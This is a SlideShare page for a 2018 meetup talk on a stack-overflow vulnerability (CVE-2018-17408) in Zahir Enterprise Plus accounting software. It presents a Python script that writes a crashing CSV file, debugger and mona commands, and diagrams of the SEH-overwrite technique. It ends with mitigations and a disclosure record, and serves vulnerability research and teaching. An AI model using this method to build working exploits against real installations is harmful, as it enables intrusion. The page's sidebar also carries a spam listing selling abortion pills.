SlideShare une entreprise Scribd logo

Blinded Stack Overflow: Just Another Common Technique

Thomas Gregory
Thomas Gregory

This presentation was presented during the Indonesian Bug Hunter Lounge first meetup, Sept 28, 2018.

Technologie
1  sur  25
Télécharger pour lire hors ligne
Blinded Stack Overflow Exploit: Just Another Common Technique Thomas Gregory | Director and Partner at PT Spentera tom@spentera.id | @modpr0be Indonesian Bug Hunter Lounge Meetup 2018
Who we are2 • Marie Muhammad • Security researcher • Penetration tester and Red team operator • Bug hunter • Hold OSCP, OSCE, CRTE • marie@spentera.id • @f3ci • Found the 0day • Thomas Gregory • Director and Partner at Spentera • Cybersecurity Consultant • Vulnerability Discovery and 0day Exploit Development • Vulnerability Assessment and Penetration Testing • Metasploit framework exploit developer • Hold OSCP, OSCE, ISO 27001:2013 LA • tom@spentera.id • @modpr0be • Just exploiting further
Agenda3
What4
Zahir Enterprise plus 6.05
Why6
How7
Fuzzing: Identifying Entry point8 • Zahir is a desktop client application, one of the identifying entry point approach is file format fuzzing. • Identifying entry points: • Menu Buka Data, a function to read from a local database or Firebird database. • Menu Membuka File Backup, a function to open an existing backup • Menu Import Data dari Zahir versi 6.0, a menu to open data from previous Zahir version. • Menu Import Data dari file lainnya, a menu to open data from CSV format file. • Menu Import Transaksi, a menu to open data from CSV format file.
Fuzzing: Accidentally crashed!9
Simple code to crash10 #!/usr/bin/python junk = "A" * 2500 junk += 'nr’ # this is the CR/LF junk += 'A' * 500 junk += "D" * 500 print "[+] Preparing for file.." filename = "junk.csv" f = open(filename, 'w') print "[+] Writing crafted CSV file.." f.write(junk) f.close() print "[+] File %s written successfully.. bring it to Mr. Zahir." %filename
Error and Crash11
Exception Handler Kicked in12
Replicate and Debug the app13
Failed: Anti debug implemented14
At this point15 Modify the main program to bypass the anti-debug function Catch and dump the crash info ! Analysis the crash dump
Crashdump analysis16
Catch the crash with procdump17 mkdir c:crashdump cd C:toolsSysinternalsSuite procdump.exe -ma -I C:crashdump
Analysis the crash with windbg18 File – Open Crash Dump
Analysis the crash with windbg19 0:000> d 0012ec30 0012ec30 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec40 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec50 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec60 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012eca0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0:000> !exchain
How SEH works20 (1) Exception terjadi+-----------------------+ | | (3) next SEH membawa kembali ke SEH-------------------------------------+ | | | | V v +------------------------------+ +--------+ +----------+ +--------+ +----------+ |AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |Next SEH| |SE Handler| +------------------------------+ +--------+ +----------+ +--------+ +----------+ Junk / buffer ^ | | | | | +-----------+ (2) SE Handler membawa kembali ke alamat SEH berikutnya
How SEH exploit works21 (1) Exception terjadi+-----------------------+ | | (3) next SEH membawa kembali ke SEH-------------------------+ | | | | V v +------------------------------+ +--------+ +----------+ +--------------------------------+ |AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |DDDDDDDDDDDDDDDDDDDDDDDDDDD....D| +------------------------------+ +--------+ +----------+ +--------------------------------+ Junk / buffer ^ | Shellcode | |POP REG | |POP REG | |RETN | | +-----------+(2) POP POP RET membawa kembali ke next SEH
Mona help during the exploit development22 # Load mona.py into WinDBG 0:000> .load pykd.pyd # Same as Metasploit pattern_create.rb and pattern_offset.rb 0:000> !py mona pc 0:000> !py mona po <offset> # Compare memory for bad characters 0:000> !py mona ba -cpb ‘x00’ 0:000> !py mona cmp -f bytearray.bin -a <start address>
Exploit FTW! Demo exploitation process.. 23
aftermath • Mitigation • Don't process files with CSV extension from untrusted parties, • Double check if trusted parties provide files with CSV extension, • Always update the operating system and your endpoint security. • Solution • There is no solution from Zahir at the moment. • Vulnerability report • Zahir was contacted but no security related response. • Submitted to National Cyber Security Operation Center under Indonesia National Cyber and Encryption Agency (BSSN) • Assigned CVE 2018-17408 24
Thank you Thomas Gregory Director and Partner at PT Spentera tom@spentera.id 25

Recommandé

Ak13 add shelf
Ak13 add shelfAk13 add shelf
Ak13 add shelfAccenture
 
Ak12 adding shelf
Ak12 adding shelfAk12 adding shelf
Ak12 adding shelfAccenture
 
Async programming: From 0 to task.IsComplete - es
Async programming: From 0 to task.IsComplete - esAsync programming: From 0 to task.IsComplete - es
Async programming: From 0 to task.IsComplete - esDarío Kondratiuk
 
Learnings from govuk
Learnings from govukLearnings from govuk
Learnings from govukGareth Rushgrove
 
computer project code ''payroll'' (based on datafile handling)
computer project code ''payroll'' (based on datafile handling)computer project code ''payroll'' (based on datafile handling)
computer project code ''payroll'' (based on datafile handling)Nitish Yadav
 
BreeCS Example Report - Timesheet (All Users, month, summary)
BreeCS Example Report - Timesheet (All Users, month, summary)BreeCS Example Report - Timesheet (All Users, month, summary)
BreeCS Example Report - Timesheet (All Users, month, summary)Daniel Raines Communications / BreeCS Software
 
Phaladeepika - appendix 3
Phaladeepika - appendix 3 Phaladeepika - appendix 3
Phaladeepika - appendix 3 Mullappilly
 
Real
RealReal
RealJoshua Silver
 

Recommandé

Ak13 add shelf
Ak13 add shelfAk13 add shelf
Ak13 add shelfAccenture
 
Ak12 adding shelf
Ak12 adding shelfAk12 adding shelf
Ak12 adding shelfAccenture
 
Async programming: From 0 to task.IsComplete - es
Async programming: From 0 to task.IsComplete - esAsync programming: From 0 to task.IsComplete - es
Async programming: From 0 to task.IsComplete - esDarío Kondratiuk
 
Learnings from govuk
Learnings from govukLearnings from govuk
Learnings from govukGareth Rushgrove
 
computer project code ''payroll'' (based on datafile handling)
computer project code ''payroll'' (based on datafile handling)computer project code ''payroll'' (based on datafile handling)
computer project code ''payroll'' (based on datafile handling)Nitish Yadav
 
BreeCS Example Report - Timesheet (All Users, month, summary)
BreeCS Example Report - Timesheet (All Users, month, summary)BreeCS Example Report - Timesheet (All Users, month, summary)
BreeCS Example Report - Timesheet (All Users, month, summary)Daniel Raines Communications / BreeCS Software
 
Phaladeepika - appendix 3
Phaladeepika - appendix 3 Phaladeepika - appendix 3
Phaladeepika - appendix 3 Mullappilly
 
Real
RealReal
RealJoshua Silver
 
Automated Server Administration for DevSecOps
Automated Server Administration for DevSecOpsAutomated Server Administration for DevSecOps
Automated Server Administration for DevSecOpsAarno Aukia
 
Refactoring legacy code guided by tests in WordPress
Refactoring legacy code guided by tests in WordPressRefactoring legacy code guided by tests in WordPress
Refactoring legacy code guided by tests in WordPressLuca Tumedei
 
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner) Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner) Puppet
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
MySQL document_store
MySQL document_storeMySQL document_store
MySQL document_storeGiuseppe Maxia
 
Php through the eyes of a hoster
Php through the eyes of a hosterPhp through the eyes of a hoster
Php through the eyes of a hosterCombell NV
 
Your admin toolbelt is not complete without Salesforce DX
Your admin toolbelt is not complete without Salesforce DXYour admin toolbelt is not complete without Salesforce DX
Your admin toolbelt is not complete without Salesforce DXDaniel Stange
 
OSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
OSCamp #4 on Foreman | CLI tools with Foreman by Martin BačovskýOSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
OSCamp #4 on Foreman | CLI tools with Foreman by Martin BačovskýNETWAYS
 
Instrumenting plugins for Performance Schema
Instrumenting plugins for Performance SchemaInstrumenting plugins for Performance Schema
Instrumenting plugins for Performance SchemaMark Leith
 
Quick and Dirty GUI Applications using GUIDeFATE
Quick and Dirty GUI Applications using GUIDeFATEQuick and Dirty GUI Applications using GUIDeFATE
Quick and Dirty GUI Applications using GUIDeFATEConnie New
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Combell NV
 
Development Workflows on AWS
Development Workflows on AWSDevelopment Workflows on AWS
Development Workflows on AWSAmazon Web Services
 
Common schema my sql uc 2012
Common schema my sql uc 2012Common schema my sql uc 2012
Common schema my sql uc 2012Roland Bouman
 
Common schema my sql uc 2012
Common schema my sql uc 2012Common schema my sql uc 2012
Common schema my sql uc 2012Roland Bouman
 
Spring MVC - The Basics
Spring MVC - The BasicsSpring MVC - The Basics
Spring MVC - The BasicsIlio Catallo
 
How to investigate and recover from a security breach in WordPress
How to investigate and recover from a security breach in WordPressHow to investigate and recover from a security breach in WordPress
How to investigate and recover from a security breach in WordPressOtto Kekäläinen
 
Creating Developer-Friendly Docker Containers with Chaperone
Creating Developer-Friendly Docker Containers with ChaperoneCreating Developer-Friendly Docker Containers with Chaperone
Creating Developer-Friendly Docker Containers with ChaperoneGary Wisniewski
 
20150423 m3
20150423 m320150423 m3
20150423 m3Kazuaki Matsuo
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
Hitchhiker's Guide to free Oracle tuning tools
Hitchhiker's Guide to free Oracle tuning toolsHitchhiker's Guide to free Oracle tuning tools
Hitchhiker's Guide to free Oracle tuning toolsBjoern Rost
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 

Contenu connexe

Similaire à Blinded Stack Overflow: Just Another Common Technique

Automated Server Administration for DevSecOps
Automated Server Administration for DevSecOpsAutomated Server Administration for DevSecOps
Automated Server Administration for DevSecOpsAarno Aukia
 
Refactoring legacy code guided by tests in WordPress
Refactoring legacy code guided by tests in WordPressRefactoring legacy code guided by tests in WordPress
Refactoring legacy code guided by tests in WordPressLuca Tumedei
 
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner) Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner) Puppet
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Santiago Bassett
 
Php through the eyes of a hoster
Php through the eyes of a hosterPhp through the eyes of a hoster
Php through the eyes of a hosterCombell NV
 
Your admin toolbelt is not complete without Salesforce DX
Your admin toolbelt is not complete without Salesforce DXYour admin toolbelt is not complete without Salesforce DX
Your admin toolbelt is not complete without Salesforce DXDaniel Stange
 
OSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
OSCamp #4 on Foreman | CLI tools with Foreman by Martin BačovskýOSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
OSCamp #4 on Foreman | CLI tools with Foreman by Martin BačovskýNETWAYS
 
Instrumenting plugins for Performance Schema
Instrumenting plugins for Performance SchemaInstrumenting plugins for Performance Schema
Instrumenting plugins for Performance SchemaMark Leith
 
Quick and Dirty GUI Applications using GUIDeFATE
Quick and Dirty GUI Applications using GUIDeFATEQuick and Dirty GUI Applications using GUIDeFATE
Quick and Dirty GUI Applications using GUIDeFATEConnie New
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Combell NV
 
Common schema my sql uc 2012
Common schema my sql uc 2012Common schema my sql uc 2012
Common schema my sql uc 2012Roland Bouman
 
Common schema my sql uc 2012
Common schema my sql uc 2012Common schema my sql uc 2012
Common schema my sql uc 2012Roland Bouman
 
Spring MVC - The Basics
Spring MVC - The BasicsSpring MVC - The Basics
Spring MVC - The BasicsIlio Catallo
 
How to investigate and recover from a security breach in WordPress
How to investigate and recover from a security breach in WordPressHow to investigate and recover from a security breach in WordPress
How to investigate and recover from a security breach in WordPressOtto Kekäläinen
 
Creating Developer-Friendly Docker Containers with Chaperone
Creating Developer-Friendly Docker Containers with ChaperoneCreating Developer-Friendly Docker Containers with Chaperone
Creating Developer-Friendly Docker Containers with ChaperoneGary Wisniewski
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon praguehernanibf
 
Hitchhiker's Guide to free Oracle tuning tools
Hitchhiker's Guide to free Oracle tuning toolsHitchhiker's Guide to free Oracle tuning tools
Hitchhiker's Guide to free Oracle tuning toolsBjoern Rost
 

Similaire à Blinded Stack Overflow: Just Another Common Technique (20)

Automated Server Administration for DevSecOps
Automated Server Administration for DevSecOpsAutomated Server Administration for DevSecOps
Automated Server Administration for DevSecOps
 
Refactoring legacy code guided by tests in WordPress
Refactoring legacy code guided by tests in WordPressRefactoring legacy code guided by tests in WordPress
Refactoring legacy code guided by tests in WordPress
 
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner) Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
Puppet Camp Melbourne 2014: Puppet and a DevOps Journey (Beginner)
 
Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014Malware Detection with OSSEC HIDS - OSSECCON 2014
Malware Detection with OSSEC HIDS - OSSECCON 2014
 
MySQL document_store
MySQL document_storeMySQL document_store
MySQL document_store
 
Php through the eyes of a hoster
Php through the eyes of a hosterPhp through the eyes of a hoster
Php through the eyes of a hoster
 
Your admin toolbelt is not complete without Salesforce DX
Your admin toolbelt is not complete without Salesforce DXYour admin toolbelt is not complete without Salesforce DX
Your admin toolbelt is not complete without Salesforce DX
 
OSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
OSCamp #4 on Foreman | CLI tools with Foreman by Martin BačovskýOSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
OSCamp #4 on Foreman | CLI tools with Foreman by Martin Bačovský
 
Instrumenting plugins for Performance Schema
Instrumenting plugins for Performance SchemaInstrumenting plugins for Performance Schema
Instrumenting plugins for Performance Schema
 
Quick and Dirty GUI Applications using GUIDeFATE
Quick and Dirty GUI Applications using GUIDeFATEQuick and Dirty GUI Applications using GUIDeFATE
Quick and Dirty GUI Applications using GUIDeFATE
 
Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11Php through the eyes of a hoster phpbnl11
Php through the eyes of a hoster phpbnl11
 
Development Workflows on AWS
Development Workflows on AWSDevelopment Workflows on AWS
Development Workflows on AWS
 
Common schema my sql uc 2012
Common schema my sql uc 2012Common schema my sql uc 2012
Common schema my sql uc 2012
 
Common schema my sql uc 2012
Common schema my sql uc 2012Common schema my sql uc 2012
Common schema my sql uc 2012
 
Spring MVC - The Basics
Spring MVC - The BasicsSpring MVC - The Basics
Spring MVC - The Basics
 
How to investigate and recover from a security breach in WordPress
How to investigate and recover from a security breach in WordPressHow to investigate and recover from a security breach in WordPress
How to investigate and recover from a security breach in WordPress
 
Creating Developer-Friendly Docker Containers with Chaperone
Creating Developer-Friendly Docker Containers with ChaperoneCreating Developer-Friendly Docker Containers with Chaperone
Creating Developer-Friendly Docker Containers with Chaperone
 
20150423 m3
20150423 m320150423 m3
20150423 m3
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
Hitchhiker's Guide to free Oracle tuning tools
Hitchhiker's Guide to free Oracle tuning toolsHitchhiker's Guide to free Oracle tuning tools
Hitchhiker's Guide to free Oracle tuning tools
 

Dernier

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024The Digital Insurer
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsRoshan Dwivedi
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 

Dernier (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 

Blinded Stack Overflow: Just Another Common Technique

  • 1. Blinded Stack Overflow Exploit: Just Another Common Technique Thomas Gregory | Director and Partner at PT Spentera tom@spentera.id | @modpr0be Indonesian Bug Hunter Lounge Meetup 2018
  • 2. Who we are2 • Marie Muhammad • Security researcher • Penetration tester and Red team operator • Bug hunter • Hold OSCP, OSCE, CRTE • marie@spentera.id • @f3ci • Found the 0day • Thomas Gregory • Director and Partner at Spentera • Cybersecurity Consultant • Vulnerability Discovery and 0day Exploit Development • Vulnerability Assessment and Penetration Testing • Metasploit framework exploit developer • Hold OSCP, OSCE, ISO 27001:2013 LA • tom@spentera.id • @modpr0be • Just exploiting further
  • 8. Fuzzing: Identifying Entry point8 • Zahir is a desktop client application, one of the identifying entry point approach is file format fuzzing. • Identifying entry points: • Menu Buka Data, a function to read from a local database or Firebird database. • Menu Membuka File Backup, a function to open an existing backup • Menu Import Data dari Zahir versi 6.0, a menu to open data from previous Zahir version. • Menu Import Data dari file lainnya, a menu to open data from CSV format file. • Menu Import Transaksi, a menu to open data from CSV format file.
  • 10. Simple code to crash10 #!/usr/bin/python junk = "A" * 2500 junk += 'nr’ # this is the CR/LF junk += 'A' * 500 junk += "D" * 500 print "[+] Preparing for file.." filename = "junk.csv" f = open(filename, 'w') print "[+] Writing crafted CSV file.." f.write(junk) f.close() print "[+] File %s written successfully.. bring it to Mr. Zahir." %filename
  • 13. Replicate and Debug the app13
  • 14. Failed: Anti debug implemented14
  • 15. At this point15 Modify the main program to bypass the anti-debug function Catch and dump the crash info ! Analysis the crash dump
  • 17. Catch the crash with procdump17 mkdir c:crashdump cd C:toolsSysinternalsSuite procdump.exe -ma -I C:crashdump
  • 18. Analysis the crash with windbg18 File – Open Crash Dump
  • 19. Analysis the crash with windbg19 0:000> d 0012ec30 0012ec30 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec40 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec50 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec60 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec70 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec80 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012ec90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0012eca0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD 0:000> !exchain
  • 20. How SEH works20 (1) Exception terjadi+-----------------------+ | | (3) next SEH membawa kembali ke SEH-------------------------------------+ | | | | V v +------------------------------+ +--------+ +----------+ +--------+ +----------+ |AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |Next SEH| |SE Handler| +------------------------------+ +--------+ +----------+ +--------+ +----------+ Junk / buffer ^ | | | | | +-----------+ (2) SE Handler membawa kembali ke alamat SEH berikutnya
  • 21. How SEH exploit works21 (1) Exception terjadi+-----------------------+ | | (3) next SEH membawa kembali ke SEH-------------------------+ | | | | V v +------------------------------+ +--------+ +----------+ +--------------------------------+ |AAAAAAAAAAAAAAAAAAAAA....AAAAA| |Next SEH| |SE Handler| |DDDDDDDDDDDDDDDDDDDDDDDDDDD....D| +------------------------------+ +--------+ +----------+ +--------------------------------+ Junk / buffer ^ | Shellcode | |POP REG | |POP REG | |RETN | | +-----------+(2) POP POP RET membawa kembali ke next SEH
  • 22. Mona help during the exploit development22 # Load mona.py into WinDBG 0:000> .load pykd.pyd # Same as Metasploit pattern_create.rb and pattern_offset.rb 0:000> !py mona pc 0:000> !py mona po <offset> # Compare memory for bad characters 0:000> !py mona ba -cpb ‘x00’ 0:000> !py mona cmp -f bytearray.bin -a <start address>
  • 24. aftermath • Mitigation • Don't process files with CSV extension from untrusted parties, • Double check if trusted parties provide files with CSV extension, • Always update the operating system and your endpoint security. • Solution • There is no solution from Zahir at the moment. • Vulnerability report • Zahir was contacted but no security related response. • Submitted to National Cyber Security Operation Center under Indonesia National Cyber and Encryption Agency (BSSN) • Assigned CVE 2018-17408 24
